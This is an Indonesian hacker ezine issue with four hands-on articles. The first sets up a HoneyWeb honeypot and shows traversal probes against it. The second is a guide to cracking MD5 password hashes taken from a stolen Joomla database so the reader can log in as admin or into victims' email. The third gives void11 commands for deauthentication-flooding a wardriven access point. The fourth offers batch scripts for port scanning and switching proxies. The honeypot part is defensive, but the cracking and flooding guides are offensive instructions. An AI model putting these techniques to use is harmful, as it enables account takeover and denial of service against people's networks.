Copy Link
Add to Bookmark
Report
Echo Magazine Issue 17 Phile 0x011
.::. .:, ..::. :. .::. .,:: ,:. ..:,. ., .:. .:::. .::. ,::. : .::. .,,
.::...., .:: .. .::. ..:: .:: ::. ., . .,::.. ::. .,::. : .::... ,
.::.... .,:: .::. ..:: ::. ,::.., .::. ::. ...::, : .::...
.::.:.. .::: .::....:: ::. ,::.., ..::. ::. . .::.: .::.:.
.::.... ,:: .::. ..:: ::, :::.., .::, . ::. . .::: .::...
.::. .,M8.:M...M8..,M:~MD .MM .M7..MM::M..Z .MM: .M8:.MM8..D..,M,.:M .::. . ,
.::,.,~M8.?,::MM:. .N:~M8 :MM..MM::.~MD.M..,.MM8...M8:.MMMM.D:.,M,..I ..::,.,::
,MMM? .7MM. ,MMMMMM..MM. .MM.M..,NM8. .M8. M.NMM8 .,MMM.
,M8.?...MM. ,M8 MM..MM .MM.M..:MM ...M8. M OMM .,M,....
,M8...,.MM. .D ,M8 MM ?M. .NM..M..MM. 8..M8. M .OM .,M,..,,.
,88D8D8....NMM..,D888D8D8...8MM:. .M.DD888D8,D88888D. .$.88D88D8..
.M.
.Z.
echo|zine, volume 5 issue 17
Hackers Logbook "hands on hacking series"
Brougt To you By : echo|staff (echostaff-at-echo-or-id)
--------------------------------------------------------------------------
|
| by: lirva32 | lirva32sf/yahoo/com
| Hands On Hacking : Playin with HoneyWeb
Kali ini akan dibahas tentang 'HoneyWeb' sebuah supplement yang biasanya dijalankan
bersama 'HoneyD' tapi kali ini saya coba mengulas tentang penjebakan terhadap Attacker
di port HTTP dan menjadikan HoneyWeb sebagai sebuah layanan mandiri tanpa harus
bergantung dengan induknya 'HoneyD'.
[Aplikasi yang dibutuhkan]
. OS Linux, dalam melakukan proses 'oprek2' ini saya mempergunakan distro Mandrake 10.
Saya telah menyeting NIC nya dengan IP : 192.168.0.18
. HoneyWeb, dapat Anda donlod di :
http://www.infoshackers.com/Archives/Softs/Protection%20et%20Attaque%20Reseau/Protection/Honeyweb.tar.gz
. Apache Web Server yang sudah dikonfigurasi dan berjalan dengan baik
. Dependency : libdnet, libpcap, libevent
. Phyton 1.5 keatas
. Browser untuk menguji keberhasilan HoneyWeb
[ Intalasi ]
+---
| [user18@user18 user18]$ su
| Password: *******
|
| [root@user18 user18]# tar -xzvf Honeyweb.tar.gz
| HoneyWeb-0.4/
| HoneyWeb-0.4/docs/
| HoneyWeb-0.4/docs/honeyd.conf
| HoneyWeb-0.4/docs/SSL.HoneyWeb
| HoneyWeb-0.4/docs/req.txt
| HoneyWeb-0.4/docs/README.honeyweb
| HoneyWeb-0.4/docs/strict.txt
| HoneyWeb-0.4/docs/INSTALL
| HoneyWeb-0.4/HD_BaseHTTPServer.py
| HoneyWeb-0.4/INSTALL
| HoneyWeb-0.4/html/
| HoneyWeb-0.4/html/attack-pages/
| HoneyWeb-0.4/html/attack-pages/apache-dir.html
| HoneyWeb-0.4/html/attack-pages/c+dir.txt
| HoneyWeb-0.4/html/attack-pages/htpasswd.txt
| HoneyWeb-0.4/html/attack-pages/passwd.txt
| HoneyWeb-0.4/html/attack-pages/htaccess.txt
| HoneyWeb-0.4/html/index.html
| HoneyWeb-0.4/html/error-pages/
| HoneyWeb-0.4/html/error-pages/apache_400a.html
| HoneyWeb-0.4/html/error-pages/apache_400b.html
| HoneyWeb-0.4/html/error-pages/apache_400d.html
| HoneyWeb-0.4/html/error-pages/apache_404.html
| HoneyWeb-0.4/html/error-pages/apache_405.html
| HoneyWeb-0.4/html/error-pages/error-pages/
| HoneyWeb-0.4/html/error-pages/error-pages/apache_400a.html
| HoneyWeb-0.4/html/error-pages/error-pages/apache_400b.html
| HoneyWeb-0.4/html/error-pages/error-pages/apache_400d.html
| HoneyWeb-0.4/html/error-pages/error-pages/apache_404.html
| HoneyWeb-0.4/html/error-pages/error-pages/apache_405.html
| HoneyWeb-0.4/html/error-pages/win_400.html
| HoneyWeb-0.4/html/error-pages/win_400a.html
| HoneyWeb-0.4/html/error-pages/win_400b.html
| HoneyWeb-0.4/html/error-pages/win_400d.html
| HoneyWeb-0.4/html/error-pages/win_404.html
| HoneyWeb-0.4/html/error-pages/win_500.html
| HoneyWeb-0.4/html/error-pages/win_501.html
| HoneyWeb-0.4/hweb_config.py
| HoneyWeb-0.4/hweb_lib.py
| HoneyWeb-0.4/log/
| HoneyWeb-0.4/MY_BaseHTTPServer.py
| HoneyWeb-0.4/scripts/
| HoneyWeb-0.4/scripts/strict-gen.py
| HoneyWeb-0.4/scripts/hwlog.sh
| HoneyWeb-0.4/scripts/honeychk.sh
| HoneyWeb-0.4/urls-strict.txt
| HoneyWeb-0.4/HoneyWeb-0.4.py
| HoneyWeb-0.4/HoneyWeb-Server-0.4.py
| HoneyWeb-0.4/README.honeyweb
| html
| log
|
|
| [root@user18 user18]# cd HoneyWeb-0.4/
|
| [root@user18 HoneyWeb-0.4]# ls
|
| docs/ html/ log/ urls-strict.txt
| HD_BaseHTTPServer.py hweb_config.py* MY_BaseHTTPServer.py
| HoneyWeb-0.4.py* hweb_lib.py* README.honeyweb@
| HoneyWeb-Server-0.4.py* INSTALL@ scripts/
|
| [root@user18 HoneyWeb-0.4]# cd scripts/
| [root@user18 scripts]# ./strict-gen.py
|
| [root@user18 user18]# cd HoneyWeb-0.4
| [root@user18 HoneyWeb-0.4]# HoneyWeb-Server-0.4.py
+--
.....
- sampai disini proses pemsangan Honeyweb selesai
- services HoneyWeb bekerja
- Setiap terjadi proses Attacking terhadap port HTTP akan tercatat
dan akan dimunculkan pada bagian ini
.....
[ Pengujian ]
. Siapkan Browser yang Anda sukai...
. Attacker biasa mengincar comand2 : .htaccess, .htpasswd, etc/passwd
Kesemua perintah tersebut sudah dipalsukan oleh HoneyWeb.
[ Pengujian o1 ]
+-----------------------------------------------------------------+
Address | http://192.168.0.18/.htaccess |
+-----------------------------------------------------------------+
Apa hasilnya :
--------------
AuthUserFile /var/www/.htpasswd
AuthType Basic
AuthName Logs
require valid-user
* isi tersebut bisa Anda modifikasi sesuka Anda... bisa juga kasih cacian
buat si Attacker.
Semua pesan2 itu terdapat di folder : HoneyWeb-0.4/html/attack-pages/
Silahkan di modifikasi.
[ Pengujian o2 ]
+-----------------------------------------------------------------+
Address | http://192.168.0.18/.htpasswd |
+-----------------------------------------------------------------+
Apa hasilnya :
--------------
fwall:OToiwq9IIQkld
jmeter:p43ikwOjsaoIY
tjes:imGYp63Xe1VxE
test:1P2PCmAFd2Xcs
* isi tersebut bisa Anda modifikasi sesuka Anda... bisa juga kasih cacian
buat si Attacker.
Semua pesan2 itu terdapat di folder : HoneyWeb-0.4/html/attack-pages/
Silahkan di modifikasi.
[ Pengujian o3 ]
+-----------------------------------------------------------------+
Address | http://192.168.0.18/etc/passwd |
+-----------------------------------------------------------------+
Apa hasilnya :
--------------
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
desktop:x:80:80:desktop:/var/lib/menu/kde:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
squid:x:23:23::/var/spool/squid:/dev/null
jevan:x:500:500::/home/jevan:/bin/bash
mjohn:x:500:500::/home/mjohn:/bin/bash
bdog:x:500:500::/home/bdog:/bin/bash
* isi tersebut bisa Anda modifikasi sesuka Anda... bisa juga kasih cacian
buat si Attacker.
Semua pesan2 itu terdapat di folder : HoneyWeb-0.4/html/attack-pages/
Silahkan di modifikasi.
[ Pengujian o4 ]
+-----------------------------------------------------------------+
Address | http://192.168.0.18/~root |
+-----------------------------------------------------------------+
Apa hasilnya :
--------------
Parent Directory -
April02/ 15-Oct-2002 09:02
Aug02/ 10-Oct-2002 06:14 -
Feb02/ 15-Oct-2002 09:02 -
Jan02/ 15-Oct-2002 09:03 -
July02/ 15-Oct-2002 09:03 -
June02/ 10-Oct-2002 06:17 -
March02/ 15-Oct-2002 09:04 -
May02/ 15-Oct-2002 09:04 -
Sep02/ 02-Oct-2002 21:41 -
apache/ 03-Oct-2002 15:52 -
other/ 14-Oct-2002 12:11 -
scanning/ 09-Oct-2002 07:11 -
windows/ 09-Oct-2002 06:48 -
* isi tersebut bisa Anda modifikasi sesuka Anda... bisa juga kasih cacian
buat si Attacker.
Semua pesan2 itu terdapat di folder : HoneyWeb-0.4/html/attack-pages/
Silahkan di modifikasi.
[ Pengujian o5 [Non Persistensi]]
+---
| [lirva32]$ telnet 192.168.0.18 80
| Trying 192.168.0.18...
| Connected to..........
| Escape character is '^]'.
| HEAD /../../etc/passwd/ HTTP/1.0
|
|
| HTTP/1.0 200 OK
| Server: Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 OpenSSL/0.9.5a PHP/4.0.4pl1 mod_perl/1.24
| Date: Wed, 9 Aug 2006 00:42:05 GMT
| Content-type: text/html
+---
+---
| [lirva32]$ telnet 192.168.0.18 80
| Trying 192.168.0.18...
| Connected to..........
| Escape character is '^]'.
| GET /default.ida? HTTP/1.0
|
|
| HTTP/1.0 200 OK
| Server: Microsoft-IIS/3.0
| Date: Wed, 9 Aug 2006 00:44:15 GMT
| Content-Length: 395
| Content-type: text/html
+---
[ Pengujian o6 [Persistensi]]
+---
| HEAD /~nobody HTTP/1.0
|
| HTTP/1.1 200 OK
| Server: Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 OpenSSL/0.9.5a PHP/4.0.4pl1 mod_perl/1.24
| Date: Wed, 9 Aug 2006 00:49:11 GMT
| Connection: close
| Content-type: text/html
| Connection closed by foreign host.
|
|
|
| [lirva32]$ telnet 192.168.0.18 80
| Trying 192.168.0.18...
| Connected to 192.168.0.18
| Escape character is '^]'.
| HEAD /bug.asp HTTP/1.0
|
|
| HTTP/1.1 404
| Server: Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 OpenSSL/0.9.5a PHP/4.0.4pl1 mod_perl/1.24
| Date: Wed, 9 Aug 2006 00:49:43 GMT
| Connection: close
| Content-type: text/html
+---
* bisa diakukan pengujian dengan fungsi2 telnet lainnya.
* semua hasil ouput tersebut dapat dimodifikasi di dalam file konfigurasi : hweb_config.py
* server emulasi yang digunakan adalah : Default_Server = 'random_any' dan bisa mengganti server
emulasi tersebut sesuka anda.
Attacker akan terjebak jika hanya mengandalkan proses 'BannerGrabbing'
Selamat Mencoba
[ Shoutz ]
. echo|staff : y3dips,m0by,the_day,comex,z3r0byt3,k-159,c-a-s-e,s'to,lirva32,anonymous
. Anakku : Faiza Debian Navisa... yang mengisi hari2ku dengan keceriaannya...
. My Friends : Mas Arif "s4k1tjiw4',az001, sevior,ocep_wie,sugeng_p,r34d3r,cbug,cyb3rtank,
cr4sh3r,istofani,#SolpotCrew, #BekasiHacker,#kecoak, #kalengbekas, #samarinda_hack,
#aikmel, #renjana and AllNewbieHacker.
. Asistenku : MadeSipit,Aghe,Arie
. someone special : 'ta... yg masih meberikan kasihnya utk saya....
. MyAlamamater : FTI-BudiLuhurUniversity
--------------------------------------------------------------------------
|
| by: bl4ck_4n6el | bl4ck_4n6el/et/yahoo/com
| Hands On Hacking : MD5 cracking
[ Web Base ]
Fasilitas MD5 dekripsi banyak dapat kita temukan. Salah satunya adalah
"web base MD5 cracking", Situs yang memberikan fasilitas untuk membalik md5 ke
bentuk karakter asli, tinggal masukkan 32 karakter yang kita dapat pada tabel
password di database mySQL yang kita curi, dan membaliknya menjadi karakter
password asli, yang bisa kita gunakan untuk login ke situsnya, atau bisa juga
untuk login ke emailnya (kebanyakan password untuk login email/lainnya, sama).
Berikut adalah web-web yang memberikan fasilitas untuk cracking MD5:
http://plain-text.info/view/action/viewallhashes
http://www.milw0rm.com/cracker/insert.php
http://md51.altervista.org
http://gdataonline.com/seekhash.php
http://md5.overclock.ch/biz/index.php
Nah, masing-masing web itu memiliki tingkat kemampuan dan akurasi yang berbeda dalam
mendekripsi MD5
[ Offline Base/Menggunakan tool MD5crack ]
Salah satu cara lainnya kita bisa menggunakan tools untuk meng-crack MD5
tersebut secara offline, salah satunya dengan menggunakan MDcrack dari Openwall
Misal kita sudah berhasil mendapatkan pasword hash dari suatu database mysql
portal jomla dengan format:
+---------------+--------------+-----------------------+---------------------------------+------------------+
| name username email password usertype
+---------------+--------------+-----------------------+---------------------------------+------------------+
| Administrator admin admin@webjomla.net 85f0be5df291ef6ccbee99793aa6436 Super Administrator
| akbar rootbluez akbar@webjomla.net bc6eb129710d3197e17576bd81272665 Super Administrator
| admin ropix support@webjomla.net 19afcc567f5344a04efedd0eba60ce19 Super Administrator
+---------------+--------------+-----------------------+---------------------------------+------------------+
- Langkah pertama download programnya di http://c3rb3r.openwall.net/mdcrack/
- Ekstrak file MDCrack-182.zip hasil download tersebut ke dalam folder, misal di D:/
- Jalankan lewat DOS promt, seperti dibawah dengan memasukkan parameter pasword
hash yang kita dapat dari database tadi
- Proses crack membutuhkan 100% resource CPU usage dan membutuhkan waktu yang
cukup lama, tergantung tingkat kesulitannya.
-----------------------------------------------------------------------------------
|
| D:\>MDCrack-sse.exe b85f0be5df291ef6ccbee99793aa6436
|
| System / Starting MDCrack v1.8(2)
| System / Running as MDCrack-sse.exe b85f0be5df291ef6ccbee99793aa6436
| System / Detected processor(s): 1 x INTEL Pentium III Coppermine | MMX | SSE
| System / Charset is: abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVW
| XYZ
| System / Detected hash format: "MD5"
| System / Target hash: b85f0be5df291ef6ccbee99793aa6436
| System / >> Entering MD5 Core 1: candidate/salt max size: 11
| Info / Press ESC for available runtime shortcuts (Ctrl-c to quit)
| Info / Thread #0: Candidate size: 1 ( + salt: 0 )
| Info / Thread #0: Candidate size: 2 ( + salt: 0 )
| Info / Thread #0: Candidate size: 3 ( + salt: 0 )
| Info / Thread #0: Candidate size: 4 ( + salt: 0 )
| Info / Thread #0: Candidate size: 5 ( + salt: 0 )
| -------------------------------------------------------/ Thread #0 (Success) \----
| System / Thread #0: Collision found: binom
| Info / Thread #0: Candidate/Hash pairs tested: 195721664 ( 1.96e+008 ) in 1min 3s 661ms
| Info / Thread #0: Allocated key space: 2.22e+014 candidates, 0.00% done
| Info / Thread #0: Average speed: ~ 3074410 ( 3.07e+006 ) h/s
|
-------------------------------------------------------------------------------------
Dari hasil diatas dapat dibaca bahwa :
hash md5 dari b85f0be5df291ef6ccbee99793aa6436 adalah "binom" tanpa tanda petik.
Jadi kita dapat login ke situs Jomla tersebut menggunakan username "admin"
dengan password "binom"
Banyak sekali aplikasi-aplikasi yang masih memakai hash md5 ini, belum ada standar
yang baku dalam suatu alogaritma penyimpanan password, tentunya ini akan menjadi masalah
jika tidak segera ditentukan suatu standar yang baru yang lebih secure.
[ Referensi ]
http://ezine.echo.or.id/ezine16/04_hash.txt
http://tools.ietf.org/html/rfc1321
http://c3rb3r.openwall.net/mdcrack/
[ thankz to ]
-y3dips,lirva32,echo staff and all members of newbie-hacker
-aldedi and PCC crew
--------------------------------------------------------------------------
|
| by: lirva32 | lirva32sf/yahoo/com
| Hands On Hacking : Flooding AP dengan Void11
Void11 merupakan salah satu aplikasi yang digunakan untuk melakukan mass
flooding terhadap Access Point. Void11 memiliki jenis metode attack, yaitu :
1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan 'deauthentication packets'
sehingga client yang terautentikasi didalam jaringannya akan ngedrop dan
terputus dari jaringan WLAN.
2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point
dengan 'authentication packets (random client MACs)'
3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets
(random client MACs)
[ Persiapan ]
+ komputer | laptop yang udah ada wificard dengan chipset Prism.
+ Lakukan Wardriving utk mendapatkan MAC Address + SSID AP si target
+ Download void11 dari : http://lirva32.org/images/void11-0.2.0.tar.bz2
+ Konfigurasi :
+----
| # cd /tools/wifi/void11-0.2.0/console
| # iwconfig wlan0 mode master
| # iwpriv wlan0 hostapd 1
| # ./void11_hopper
+----
+ alternatif void_hopper mode juga bisa meprgunakan :
+----
| # iwconfig wlan0 channel 6 ;(set card to channel 6)
+----
[ Perintah ]
+---
| # void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]
+---
[ Skenario ]
Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka
awali dengan terlebih dahulu melakukan wardriving, biasanya dengan kismet/netstumbler.
Dari hasil wardriving didapatkan :
SSID : linksys
mAC : 00:06:BF:64:AB:35
[ Attacking phase]
+---
| # void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35
+---
check for the AP ? .. selamat menikmati
[ Referensi ]
www.wirelessdefense.org
[ Shoutz ]
. echo|staff : y3dips,m0by,the_day,comex,z3r0byt3,k-159,c-a-s-e,s'to,anonymous
. Anakku : Faiza Debian Navisa... yang mengisi hari2ku dengan keceriaannya...
. My Friends : Mas Arif "s4k1tjiw4',az001, sevior,ocep_wie,sugeng_p,r34d3r,cbug,cyb3rtank,
cr4sh3r,,#SolpotCrew, #BekasiHacker,#kecoak, #kalengbekas, #samarinda_hack,
#aikmel, #renjana and AllNewbieHacker, komar@bms.
. Asistenku : MadeSipit,Aghe,Arie
. MyAlamamater : FTI-BudiLuhurUniversity
--------------------------------------------------------------------------
|
| by: jomblo.keparat | jomblo.keparat/gmail/com
| Hands On Hacking : Batch Script Collection
[ Batch IP Configuration ]
Sebuah tool yang berguna untuk menambahkan ip address lewat console DOS Prompt,
seperti layaknya ifconfig di linux. Tool ini dibuat dengan sedikit modifikasi command
netsh yang tersedia pada DOS Prompt.Cara penggunaannya pada console DOS cukup ketik :\
ipkonfig [ip address] [netmask] [gateway] [dns1]
misal : c:\>ipkonfig 10.10.10.2 255.255.255.0 10.10.10.1 202.111.1.11
nb: ipkonfig disesuaikan dengan nama file batchnya.
+------+ Scriptz +-------------------------
|
| rem ################# save file as ipkonfig.bat ##################
| @echo off
| echo.
| rem banner, please remove hehehe :D
| rem **************************************************************
| rem * Batch ipkonfig v1.0 *
| rem * by jomblo_keparat *
| rem * (c)opyleft M.U.T Laboratory 2007 *
| rem * usage : ipkonfig [ip address] [netmask] [gateway] [dns1] *
| rem * *
| rem **************************************************************
|
| set ipkonfig=c:\windows\system32\ipkonfig.bat
| set tujuan=c:\windows\system32\
| if not exist %ipkonfig% copy ipkonfig.bat %tujuan%
| title Batch ipkonfig v1.0 - usage ipkonfig [ip address] [netmask] [gateway] [dns1]
| echo plizz wait lagi di proses ooyy ...
| rem -- usage : ip [ip address] [netmask] [gateway] [dns1]
| set eth="Local Area Connection"
| echo Set Alamat IP dan netmask : && netsh interface ip set address name=%eth% source=static addr=%1 mask=%2
| echo set gateway : && netsh interface ip set address name=%eth% gateway=%3 gwmetric=1
| echo set DNS : && netsh interface ip set dns name=%eth% source=static addr=%4 register=primary
| echo finish!
| echo.
| echo.
| echo ---------------------------------------------------------------
| ipconfig /all
| rem ######################### eof ##############################
|
+----
[ Batch Port Scanner ]
Tool sederhana dari racikan batch file yang berguna untuk scaning port sebuah system.
Cara menggunakannya seperti biasa dengan menggunakan modus command line pada
DOS prompt : sken [IP target] [port awal] [port akhir]
misal : c:\>sken 22.22.22.1 20 25
+------+ Scriptz +-------------------------
|
| @rem ################# save file as sken.bat ####################
| @echo off
| echo.
| rem banner :D from me , please remove
| rem *****************************************************
| rem * Batch Port Scanner v1.0 *
| rem * by jomblo_keparat *
| rem * (c)opyleft M.U.T Laboratory 2007 *
| rem * usage : sken [target] [port awal] [port akhir] *
| rem * *
| rem *****************************************************
| title Scaning %1 port %2 - %3 in progress please wait ...
| echo Batch Port Scaning v1.0
| echo.
| for /l %%i in (%2,1,%3) do echo port %%i : && netsh diag connect iphost %1 %%i | findstr "Server" && echo --------------------
| title Command Prompt
| echo.
| echo finish!
| rem ######################### eof ##############################
|
+------
[ Batch Proxy List ]
Tool batch ini hanyalah untuk mempercepat penggunaan ip proxy dalam browser Internet Explorer.
Misal anda mempunyai list free proxy dari berbagai negara maka anda tinggal menambahkan ip,
port serta country proxy tersebut pada tool batch ini. Cara menggunakannya pada console DOS ketik
proksi [negara_yang_ingin_di_pakai]
misal anda ingin menggunakan proxy negara thailand cukup ketik
c:\>proksi thailand
maka browser IE akan menggunakan ip proxy sesuai dengan yang anda tambahkan.
nb: proksi disesuaikan dengan nama file batchnya.
+------+ Scriptz +-------------------------
|
| @rem ################# save file as proksi.bat ##################
| @echo off
| rem banner :D from me , please remove
| rem *****************************************************
| rem * Batch Proxy List [only IE] *
| rem * by jomblo_keparat *
| rem * (c)opyleft M.U.T Laboratory 2007 *
| rem * usage : proksi [negara_yang_ingin_di_pakai] *
| rem * *
| rem *****************************************************
| :error
| echo usage : proksi [negara], ex c:\>proksi ngalam
|
| rem *tambahkan list free proxy disini, cari di google ya yang paling fresh!
| set port1=8080
| set port2=3284
| set proxy1=221.153.56.253:%port1%
| set proxy2=91.121.5.175:%port1%
| set proxy3=44.55.66.232:%port2%
| set proxy4=10.10.10.1:%port2%
| set proxy5=22.22.22.25:%port2%
|
| rem *tambahkan juga list negara berdasarkan proxy nya
| if %1==ngalam set aktifkan=%proxy1%
| if %1==rasapned set aktifkan=%proxy2%
| if %1==nenjap set aktifkan=%proxy3%
| if %1==nateses set aktifkan=%proxy4%
| if %1==ndrokilo set aktifkan=%proxy5%
| if %1== goto error
|
| title Batch_Proxy_List v1.0
| rem *masukkan data ke registry
| reg add "hkcu\software\microsoft\windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
| reg add "hkcu\software\microsoft\windows\CurrentVersion\Internet Settings" /v ProxyOverride /t REG_SZ /d "<local>" /f
| reg add "hkcu\software\microsoft\windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d %aktifkan% /f
| cls
|
| echo running cooyy ...
| echo pake IP proxy : %aktifkan%
| echo country : %1
| echo tekan apa aja utk exit..
| pause>null
| cls
| title Command Prompt
| echo buka IE atau restart dulu IE nya, silahkan test ke DNSstuff.com ...
| echo bye, CMIIW.
| rem ######################### eof ##############################
|
+-------
[ Referensi]
1. Help Windows XP commands.
start->run hh.exe ms-its:C:\WINDOWS\Help\ntcmds.chm::/ntcmds.htm
2. Google.com
[ Shoutz and greetz ]
~ All e-c-h-o staff and all e-c-h-o members, moklet-underground team,Balihack
~ mypapipu,ghoz,nitux,dekretak,th0ngkring,cr45hs3r,pertapa,q_rex,BNM,kerinduan,
br0k3n_d4y,kang parmin,camagenta,slackx,ponklee,bujang_keparat,koeching ..etc
~ fosil-x crew , sevensegmen
~ girl with initial h**** f****y a****i
*- $11dottxt - echo|zine - issue#17 - 070707 -*
